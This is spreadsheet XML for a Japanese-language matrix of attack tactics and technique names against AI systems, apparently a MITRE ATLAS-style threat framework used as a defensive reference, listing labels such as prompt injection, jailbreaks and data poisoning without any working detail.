    <col min="1" max="1" width="20.712962962963" style="2" customWidth="1"/>
    <col min="2" max="2" width="20.712962962963" style="3" customWidth="1"/>
    <col min="3" max="3" width="20.712962962963" style="2" customWidth="1"/>
    <col min="4" max="4" width="20.712962962963" style="3" customWidth="1"/>
    <col min="5" max="5" width="20.712962962963" style="2" customWidth="1"/>
    <col min="6" max="6" width="20.712962962963" style="3" customWidth="1"/>
    <col min="7" max="7" width="20.712962962963" style="4" customWidth="1"/>
    <col min="8" max="8" width="20.712962962963" style="2" customWidth="1"/>
    <col min="9" max="9" width="20.712962962963" style="3" customWidth="1"/>
    <col min="10" max="10" width="20.712962962963" style="2" customWidth="1"/>
    <col min="11" max="11" width="20.712962962963" style="3" customWidth="1"/>
    <col min="12" max="12" width="20.712962962963" style="4" customWidth="1"/>
    <col min="13" max="13" width="20.712962962963" style="2" customWidth="1"/>
    <col min="14" max="14" width="20.712962962963" style="3" customWidth="1"/>
    <col min="15" max="15" width="20.712962962963" style="4" customWidth="1"/>
    <col min="16" max="16" width="20.712962962963" style="2" customWidth="1"/>
    <col min="17" max="17" width="20.712962962963" style="3" customWidth="1"/>
    <col min="18" max="18" width="20.712962962963" style="4" customWidth="1"/>
    <col min="19" max="19" width="20.712962962963" style="2" customWidth="1"/>
    <col min="20" max="20" width="20.712962962963" style="3" customWidth="1"/>
    <col min="21" max="21" width="20.712962962963" style="4" customWidth="1"/>
    <col min="22" max="22" width="20.712962962963" style="2" customWidth="1"/>
    <col min="23" max="23" width="20.712962962963" style="3" customWidth="1"/>
    <col min="24" max="24" width="20.712962962963" style="2" customWidth="1"/>
    <col min="25" max="25" width="20.712962962963" style="3" customWidth="1"/>
    <col min="26" max="26" width="20.712962962963" style="4" customWidth="1"/>
    <col min="27" max="16384" width="9" style="4"/>
  </cols>
  <sheetData>
    <row r="1" s="1" customFormat="1" ht="37.2" spans="1:25">
      <c r="A1" s="5" t="str">
        <f>'tactics (ja)'!C15</f>
        <v>偵察</v>
      </c>
      <c r="B1" s="5"/>
      <c r="C1" s="5" t="str">
        <f>'tactics (ja)'!C16</f>
        <v>リソースの開発</v>
      </c>
      <c r="D1" s="5"/>
      <c r="E1" s="5" t="str">
        <f>'tactics (ja)'!C12</f>
        <v>初期アクセス</v>
      </c>
      <c r="F1" s="5"/>
      <c r="G1" s="6" t="str">
        <f>'tactics (ja)'!C3</f>
        <v>AI モデルへのアクセス</v>
      </c>
      <c r="H1" s="5" t="str">
        <f>'tactics (ja)'!C9</f>
        <v>実行</v>
      </c>
      <c r="I1" s="5"/>
      <c r="J1" s="5" t="str">
        <f>'tactics (ja)'!C13</f>
        <v>永続化</v>
      </c>
      <c r="K1" s="5"/>
      <c r="L1" s="6" t="str">
        <f>'tactics (ja)'!C14</f>
        <v>権限昇格</v>
      </c>
      <c r="M1" s="5" t="str">
        <f>'tactics (ja)'!C7</f>
        <v>防御策の回避</v>
      </c>
      <c r="N1" s="5"/>
      <c r="O1" s="6" t="str">
        <f>'tactics (ja)'!C6</f>
        <v>資格情報へのアクセス</v>
      </c>
      <c r="P1" s="5" t="str">
        <f>'tactics (ja)'!C8</f>
        <v>探索</v>
      </c>
      <c r="Q1" s="5"/>
      <c r="R1" s="6" t="str">
        <f>'tactics (ja)'!C4</f>
        <v>収集</v>
      </c>
      <c r="S1" s="5" t="str">
        <f>'tactics (ja)'!C2</f>
        <v>AI 攻撃のステージング</v>
      </c>
      <c r="T1" s="5"/>
      <c r="U1" s="6" t="str">
        <f>'tactics (ja)'!C5</f>
        <v>コマンド＆コントロール</v>
      </c>
      <c r="V1" s="5" t="str">
        <f>'tactics (ja)'!C10</f>
        <v>持出し</v>
      </c>
      <c r="W1" s="5"/>
      <c r="X1" s="5" t="str">
        <f>'tactics (ja)'!C11</f>
        <v>影響</v>
      </c>
      <c r="Y1" s="5"/>
    </row>
    <row r="2" ht="28.8" spans="1:24">
      <c r="A2" s="2" t="str">
        <f>'techniques (ja)'!C11</f>
        <v>能動的なスキャン</v>
      </c>
      <c r="C2" s="7" t="str">
        <f>'techniques (ja)'!C9</f>
        <v>インフラストラクチャの獲得</v>
      </c>
      <c r="D2" s="3" t="str">
        <f>'techniques (ja)'!C3</f>
        <v>AI 開発のワークスペース</v>
      </c>
      <c r="E2" s="7" t="str">
        <f>'techniques (ja)'!C7</f>
        <v>AI サプライ チェーンの侵害</v>
      </c>
      <c r="F2" s="3" t="str">
        <f>'techniques (ja)'!C6</f>
        <v>AI ソフトウェア</v>
      </c>
      <c r="G2" s="4" t="str">
        <f>'techniques (ja)'!C5</f>
        <v>AI モデルの推論 API へのアクセス</v>
      </c>
      <c r="H2" s="2" t="str">
        <f>'techniques (ja)'!C18</f>
        <v>コマンドおよびスクリプト インタープリター</v>
      </c>
      <c r="J2" s="2" t="str">
        <f>'techniques (ja)'!C69</f>
        <v>LLM プロンプトの自己複製</v>
      </c>
      <c r="L2" s="4" t="str">
        <f>'techniques (ja)'!C64</f>
        <v>LLM の脱獄</v>
      </c>
      <c r="M2" s="2" t="str">
        <f>'techniques (ja)'!C21</f>
        <v>AI モデルの破損</v>
      </c>
      <c r="O2" s="9" t="str">
        <f>'techniques (ja)'!C110</f>
        <v>セキュリティ上問題のある資格情報</v>
      </c>
      <c r="P2" s="2" t="str">
        <f>'techniques (ja)'!C17</f>
        <v>クラウド サービスの探索</v>
      </c>
      <c r="R2" s="4" t="str">
        <f>'techniques (ja)'!C2</f>
        <v>AI アーティファクトの収集</v>
      </c>
      <c r="S2" s="10" t="str">
        <f>'techniques (ja)'!C23</f>
        <v>敵対的データの作成</v>
      </c>
      <c r="T2" s="3" t="str">
        <f>'techniques (ja)'!C14</f>
        <v>ブラック ボックス最適化</v>
      </c>
      <c r="U2" s="4" t="str">
        <f>'techniques (ja)'!C92</f>
        <v>リバース シェル</v>
      </c>
      <c r="V2" s="10" t="str">
        <f>'techniques (ja)'!C45</f>
        <v>AI の推論 API による流出</v>
      </c>
      <c r="W2" s="3" t="str">
        <f>'techniques (ja)'!C49</f>
        <v>AI モデルの抽出</v>
      </c>
      <c r="X2" s="2" t="str">
        <f>'techniques (ja)'!C22</f>
        <v>コスト ハーベスティング</v>
      </c>
    </row>
    <row r="3" ht="28.8" spans="1:24">
      <c r="A3" s="2" t="str">
        <f>'techniques (ja)'!C54</f>
        <v>RAG インデックス化された対象の収集</v>
      </c>
      <c r="C3" s="7"/>
      <c r="D3" s="3" t="str">
        <f>'techniques (ja)'!C19</f>
        <v>消費者向けハードウェア</v>
      </c>
      <c r="E3" s="7"/>
      <c r="F3" s="3" t="str">
        <f>'techniques (ja)'!C25</f>
        <v>データ</v>
      </c>
      <c r="G3" s="4" t="str">
        <f>'techniques (ja)'!C8</f>
        <v>AI 対応の製品やサービス</v>
      </c>
      <c r="H3" s="2" t="str">
        <f>'techniques (ja)'!C65</f>
        <v>LLM プラグインの侵害</v>
      </c>
      <c r="J3" s="7" t="str">
        <f>'techniques (ja)'!C73</f>
        <v>AI モデルの操作</v>
      </c>
      <c r="K3" s="3" t="str">
        <f>'techniques (ja)'!C78</f>
        <v>AI モデルのアーキテクチャの改変</v>
      </c>
      <c r="L3" s="4" t="str">
        <f>'techniques (ja)'!C65</f>
        <v>LLM プラグインの侵害</v>
      </c>
      <c r="M3" s="2" t="str">
        <f>'techniques (ja)'!C44</f>
        <v>AI モデルの回避</v>
      </c>
      <c r="P3" s="2" t="str">
        <f>'techniques (ja)'!C32</f>
        <v>AI アーティファクトの探索</v>
      </c>
      <c r="R3" s="4" t="str">
        <f>'techniques (ja)'!C26</f>
        <v>情報リポジトリのデータ</v>
      </c>
      <c r="S3" s="10"/>
      <c r="T3" s="3" t="str">
        <f>'techniques (ja)'!C15</f>
        <v>ブラック ボックス転送</v>
      </c>
      <c r="V3" s="10"/>
      <c r="W3" s="3" t="str">
        <f>'techniques (ja)'!C59</f>
        <v>学習データのメンバーシップ推論</v>
      </c>
      <c r="X3" s="2" t="str">
        <f>'techniques (ja)'!C29</f>
        <v>AI サービスへの運用妨害</v>
      </c>
    </row>
    <row r="4" ht="28.8" spans="1:24">
      <c r="A4" s="2" t="str">
        <f>'techniques (ja)'!C93</f>
        <v>アプリケーション リポジトリの検索</v>
      </c>
      <c r="C4" s="7" t="str">
        <f>'techniques (ja)'!C10</f>
        <v>公開されている AI アーティファクトの獲得</v>
      </c>
      <c r="D4" s="3" t="str">
        <f>'techniques (ja)'!C28</f>
        <v>データセット</v>
      </c>
      <c r="E4" s="7"/>
      <c r="F4" s="3" t="str">
        <f>'techniques (ja)'!C56</f>
        <v>ハードウェア</v>
      </c>
      <c r="G4" s="4" t="str">
        <f>'techniques (ja)'!C53</f>
        <v>AI モデルへの完全なアクセス</v>
      </c>
      <c r="H4" s="8" t="str">
        <f>'techniques (ja)'!C67</f>
        <v>LLM プロンプト インジェクション</v>
      </c>
      <c r="I4" s="3" t="str">
        <f>'techniques (ja)'!C31</f>
        <v>直接（インジェクション）</v>
      </c>
      <c r="J4" s="7"/>
      <c r="K4" s="3" t="str">
        <f>'techniques (ja)'!C83</f>
        <v>AI モデルの汚染</v>
      </c>
      <c r="M4" s="8" t="str">
        <f>'techniques (ja)'!C51</f>
        <v>偽 RAG エントリ インジェクション</v>
      </c>
      <c r="N4" s="3" t="str">
        <f>'techniques (ja)'!C16</f>
        <v>引用</v>
      </c>
      <c r="P4" s="2" t="str">
        <f>'techniques (ja)'!C33</f>
        <v>AI モデル ファミリーの探索</v>
      </c>
      <c r="R4" s="4" t="str">
        <f>'techniques (ja)'!C27</f>
        <v>ローカル システムのデータ</v>
      </c>
      <c r="S4" s="10"/>
      <c r="T4" s="3" t="str">
        <f>'techniques (ja)'!C60</f>
        <v>バックドア トリガーの挿入</v>
      </c>
      <c r="V4" s="10"/>
      <c r="W4" s="3" t="str">
        <f>'techniques (ja)'!C61</f>
        <v>AI モデルの反転</v>
      </c>
      <c r="X4" s="2" t="str">
        <f>'techniques (ja)'!C41</f>
        <v>AI モデルの整合性の侵害</v>
      </c>
    </row>
    <row r="5" ht="43.2" spans="1:25">
      <c r="A5" s="2" t="str">
        <f>'techniques (ja)'!C94</f>
        <v>AI の脆弱性に関する公開されている分析結果の検索</v>
      </c>
      <c r="C5" s="7"/>
      <c r="D5" s="3" t="str">
        <f>'techniques (ja)'!C77</f>
        <v>モデル（注: 原文では Models）</v>
      </c>
      <c r="E5" s="7"/>
      <c r="F5" s="3" t="str">
        <f>'techniques (ja)'!C76</f>
        <v>モデル（注: 原文では Model）</v>
      </c>
      <c r="G5" s="4" t="str">
        <f>'techniques (ja)'!C82</f>
        <v>物理環境へのアクセス</v>
      </c>
      <c r="H5" s="8"/>
      <c r="I5" s="3" t="str">
        <f>'techniques (ja)'!C58</f>
        <v>間接（インジェクション）</v>
      </c>
      <c r="J5" s="2" t="str">
        <f>'techniques (ja)'!C84</f>
        <v>学習データの汚染</v>
      </c>
      <c r="M5" s="8"/>
      <c r="N5" s="3" t="str">
        <f>'techniques (ja)'!C20</f>
        <v>コンテナ レジストリ</v>
      </c>
      <c r="P5" s="2" t="str">
        <f>'techniques (ja)'!C34</f>
        <v>AI モデルのオントロジーの探索</v>
      </c>
      <c r="S5" s="10"/>
      <c r="T5" s="3" t="str">
        <f>'techniques (ja)'!C74</f>
        <v>手動による変更</v>
      </c>
      <c r="V5" s="2" t="str">
        <f>'techniques (ja)'!C46</f>
        <v>サイバー手段による流出</v>
      </c>
      <c r="X5" s="2" t="str">
        <f>'techniques (ja)'!C42</f>
        <v>データセットの整合性の侵害</v>
      </c>
      <c r="Y5" s="3" t="str">
        <f>'techniques (ja)'!C72</f>
        <v>悪意のあるパッケージ</v>
      </c>
    </row>
    <row r="6" ht="28.8" spans="1:24">
      <c r="A6" s="7" t="str">
        <f>'techniques (ja)'!C95</f>
        <v>公開されている技術データベースの検索</v>
      </c>
      <c r="B6" s="3" t="str">
        <f>'techniques (ja)'!C62</f>
        <v>定期刊行物やカンファレンス議事録</v>
      </c>
      <c r="C6" s="2" t="str">
        <f>'techniques (ja)'!C30</f>
        <v>機能の開発</v>
      </c>
      <c r="D6" s="3" t="str">
        <f>'techniques (ja)'!C13</f>
        <v>AI への敵対的攻撃</v>
      </c>
      <c r="E6" s="2" t="str">
        <f>'techniques (ja)'!C39</f>
        <v>ドライブ バイによる侵害</v>
      </c>
      <c r="H6" s="2" t="str">
        <f>'techniques (ja)'!C112</f>
        <v>ユーザーによる実行</v>
      </c>
      <c r="I6" s="3" t="str">
        <f>'techniques (ja)'!C109</f>
        <v>安全でない AI アーティファクト</v>
      </c>
      <c r="J6" s="2" t="str">
        <f>'techniques (ja)'!C89</f>
        <v>RAG の汚染</v>
      </c>
      <c r="M6" s="8"/>
      <c r="N6" s="3" t="str">
        <f>'techniques (ja)'!C40</f>
        <v>マルウェアの埋め込み</v>
      </c>
      <c r="P6" s="2" t="str">
        <f>'techniques (ja)'!C35</f>
        <v>AI モデルの出力の探索</v>
      </c>
      <c r="Q6" s="3" t="str">
        <f>'techniques (ja)'!C55</f>
        <v>生成 AI</v>
      </c>
      <c r="S6" s="10"/>
      <c r="T6" s="3" t="str">
        <f>'techniques (ja)'!C116</f>
        <v>ホワイト ボックス最適化</v>
      </c>
      <c r="V6" s="2" t="str">
        <f>'techniques (ja)'!C50</f>
        <v>LLM システム プロンプトの抽出</v>
      </c>
      <c r="X6" s="2" t="str">
        <f>'techniques (ja)'!C44</f>
        <v>AI モデルの回避</v>
      </c>
    </row>
    <row r="7" ht="28.8" spans="1:25">
      <c r="A7" s="7"/>
      <c r="B7" s="3" t="str">
        <f>'techniques (ja)'!C85</f>
        <v>プレプリント リポジトリ</v>
      </c>
      <c r="C7" s="2" t="str">
        <f>'techniques (ja)'!C43</f>
        <v>アカウントの確立</v>
      </c>
      <c r="E7" s="2" t="str">
        <f>'techniques (ja)'!C44</f>
        <v>AI モデルの回避</v>
      </c>
      <c r="M7" s="2" t="str">
        <f>'techniques (ja)'!C57</f>
        <v>なりすまし</v>
      </c>
      <c r="P7" s="10" t="str">
        <f>'techniques (ja)'!C36</f>
        <v>LLM の幻覚の探索</v>
      </c>
      <c r="Q7" s="3" t="str">
        <f>'techniques (ja)'!C38</f>
        <v>ドメイン</v>
      </c>
      <c r="S7" s="10" t="str">
        <f>'techniques (ja)'!C24</f>
        <v>プロキシー AI モデルの作成</v>
      </c>
      <c r="T7" s="3" t="str">
        <f>'techniques (ja)'!C107</f>
        <v>収集した AI アーティファクトによるプロキシーの学習</v>
      </c>
      <c r="V7" s="2" t="str">
        <f>'techniques (ja)'!C63</f>
        <v>LLM からのデータ漏洩</v>
      </c>
      <c r="X7" s="7" t="str">
        <f>'techniques (ja)'!C48</f>
        <v>外部への危害</v>
      </c>
      <c r="Y7" s="3" t="str">
        <f>'techniques (ja)'!C4</f>
        <v>AI 知的財産の窃取</v>
      </c>
    </row>
    <row r="8" ht="28.8" spans="1:25">
      <c r="A8" s="7"/>
      <c r="B8" s="3" t="str">
        <f>'techniques (ja)'!C106</f>
        <v>技術ブログ</v>
      </c>
      <c r="C8" s="2" t="str">
        <f>'techniques (ja)'!C66</f>
        <v>LLM プロンプトの作成</v>
      </c>
      <c r="E8" s="2" t="str">
        <f>'techniques (ja)'!C47</f>
        <v>公開アプリケーションの悪用</v>
      </c>
      <c r="M8" s="2" t="str">
        <f>'techniques (ja)'!C64</f>
        <v>LLM の脱獄</v>
      </c>
      <c r="P8" s="10"/>
      <c r="Q8" s="3" t="str">
        <f>'techniques (ja)'!C81</f>
        <v>物理的な対抗手段</v>
      </c>
      <c r="S8" s="10"/>
      <c r="T8" s="3" t="str">
        <f>'techniques (ja)'!C108</f>
        <v>レプリケーションによるプロキシーの学習</v>
      </c>
      <c r="V8" s="2" t="str">
        <f>'techniques (ja)'!C70</f>
        <v>LLM 応答のレンダリング</v>
      </c>
      <c r="W8" s="3" t="str">
        <f>'techniques (ja)'!C97</f>
        <v>サーバーレス</v>
      </c>
      <c r="X8" s="7"/>
      <c r="Y8" s="3" t="str">
        <f>'techniques (ja)'!C52</f>
        <v>財務的損害</v>
      </c>
    </row>
    <row r="9" ht="43.2" spans="1:25">
      <c r="A9" s="2" t="str">
        <f>'techniques (ja)'!C96</f>
        <v>被害者が所有するウェブサイトの検索</v>
      </c>
      <c r="C9" s="7" t="str">
        <f>'techniques (ja)'!C79</f>
        <v>機能の獲得</v>
      </c>
      <c r="D9" s="3" t="str">
        <f>'techniques (ja)'!C12</f>
        <v>AI への敵対的攻撃の実装</v>
      </c>
      <c r="E9" s="2" t="str">
        <f>'techniques (ja)'!C80</f>
        <v>フィッシング</v>
      </c>
      <c r="F9" s="3" t="str">
        <f>'techniques (ja)'!C101</f>
        <v>LLM ソーシャル エンジニアリングによるスピア フィッシング</v>
      </c>
      <c r="M9" s="2" t="str">
        <f>'techniques (ja)'!C68</f>
        <v>LLM プロンプトの難読化</v>
      </c>
      <c r="P9" s="10" t="str">
        <f>'techniques (ja)'!C37</f>
        <v>LLM のシステム情報の探索</v>
      </c>
      <c r="Q9" s="3" t="str">
        <f>'techniques (ja)'!C102</f>
        <v>特殊文字セット</v>
      </c>
      <c r="S9" s="10"/>
      <c r="T9" s="3" t="str">
        <f>'techniques (ja)'!C111</f>
        <v>学習済みモデルの使用</v>
      </c>
      <c r="X9" s="7"/>
      <c r="Y9" s="3" t="str">
        <f>'techniques (ja)'!C90</f>
        <v>風評被害</v>
      </c>
    </row>
    <row r="10" ht="28.8" spans="3:25">
      <c r="C10" s="7"/>
      <c r="D10" s="3" t="str">
        <f>'techniques (ja)'!C99</f>
        <v>ソフトウェア ツール</v>
      </c>
      <c r="E10" s="2" t="str">
        <f>'techniques (ja)'!C114</f>
        <v>有効なアカウント</v>
      </c>
      <c r="M10" s="2" t="str">
        <f>'techniques (ja)'!C71</f>
        <v>LLM からの信頼された出力コンポーネントの操作</v>
      </c>
      <c r="P10" s="10"/>
      <c r="Q10" s="3" t="str">
        <f>'techniques (ja)'!C104</f>
        <v>システム命令に関するキーワード</v>
      </c>
      <c r="S10" s="10" t="str">
        <f>'techniques (ja)'!C73</f>
        <v>AI モデルの操作</v>
      </c>
      <c r="T10" s="3" t="str">
        <f>'techniques (ja)'!C78</f>
        <v>AI モデルのアーキテクチャの改変</v>
      </c>
      <c r="X10" s="7"/>
      <c r="Y10" s="3" t="str">
        <f>'techniques (ja)'!C98</f>
        <v>社会的損害</v>
      </c>
    </row>
    <row r="11" spans="3:25">
      <c r="C11" s="2" t="str">
        <f>'techniques (ja)'!C84</f>
        <v>学習データの汚染</v>
      </c>
      <c r="M11" s="2" t="str">
        <f>'techniques (ja)'!C75</f>
        <v>マスカレード</v>
      </c>
      <c r="P11" s="10"/>
      <c r="Q11" s="3" t="str">
        <f>'techniques (ja)'!C105</f>
        <v>システム プロンプト</v>
      </c>
      <c r="S11" s="10"/>
      <c r="T11" s="3" t="str">
        <f>'techniques (ja)'!C83</f>
        <v>AI モデルの汚染</v>
      </c>
      <c r="X11" s="7"/>
      <c r="Y11" s="3" t="str">
        <f>'techniques (ja)'!C113</f>
        <v>ユーザー被害</v>
      </c>
    </row>
    <row r="12" ht="43.2" spans="3:24">
      <c r="C12" s="2" t="str">
        <f>'techniques (ja)'!C86</f>
        <v>幻覚化されたエンティティの公開</v>
      </c>
      <c r="S12" s="2" t="str">
        <f>'techniques (ja)'!C115</f>
        <v>攻撃の検証</v>
      </c>
      <c r="X12" s="2" t="str">
        <f>'techniques (ja)'!C100</f>
        <v>AI システムに対するチャフ データを使用したスパム攻撃</v>
      </c>
    </row>
    <row r="13" ht="28.8" spans="3:3">
      <c r="C13" s="2" t="str">
        <f>'techniques (ja)'!C87</f>
        <v>汚染済みデータセットの公開</v>
      </c>
    </row>
    <row r="14" spans="3:3">
      <c r="C14" s="2" t="str">
        <f>'techniques (ja)'!C88</f>
        <v>汚染済みモデルの公開</v>
      </c>
    </row>
    <row r="15" spans="3:3">
      <c r="C15" s="2" t="str">
        <f>'techniques (ja)'!C91</f>
        <v>検索コンテンツの作成</v>
      </c>
    </row>
    <row r="16" spans="3:3">
      <c r="C16" s="2" t="str">
        <f>'techniques (ja)'!C103</f>
        <v>機能のステージング</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="25">
    <mergeCell ref="A1:B1"/>
    <mergeCell ref="C1:D1"/>
    <mergeCell ref="E1:F1"/>
    <mergeCell ref="H1:I1"/>
    <mergeCell ref="J1:K1"/>
    <mergeCell ref="M1:N1"/>
    <mergeCell ref="P1:Q1"/>
    <mergeCell ref="S1:T1"/>
    <mergeCell ref="V1:W1"/>
    <mergeCell ref="X1:Y1"/>
    <mergeCell ref="A6:A8"/>
    <mergeCell ref="C2:C3"/>
    <mergeCell ref="C4:C5"/>
    <mergeCell ref="C9:C10"/>
    <mergeCell ref="E2:E5"/>
    <mergeCell ref="H4:H5"/>
    <mergeCell ref="J3:J4"/>
    <mergeCell ref="M4:M6"/>
    <mergeCell ref="P7:P8"/>
    <mergeCell ref="P9:P11"/>
    <mergeCell ref="S2:S6"/>
    <mergeCell ref="S7:S9"/>
    <mergeCell ref="S10:S11"/>
    <mergeCell ref="V2:V4"/>
    <mergeCell ref="X7:X1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techniques</vt:lpstr>
      <vt:lpstr>tactics</vt:lpstr>
      <vt:lpstr>mitigations</vt:lpstr>
      <vt:lpstr>matrix</vt:lpstr>
      <vt:lpstr>techniques (ja)</vt:lpstr>
      <vt:lpstr>tactics (ja)</vt:lpstr>
      <vt:lpstr>mitigations (ja)</vt:lpstr>
      <vt:lpstr>matrix (ja)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dsk.imgw</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-04-22T22:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-06-27T05:35:47Z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DDFA02BBFF8A4847B8AA75449B891D36</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>1041-11.2.0.10707</vt:lpwstr>
  </property>
</Properties>
</file>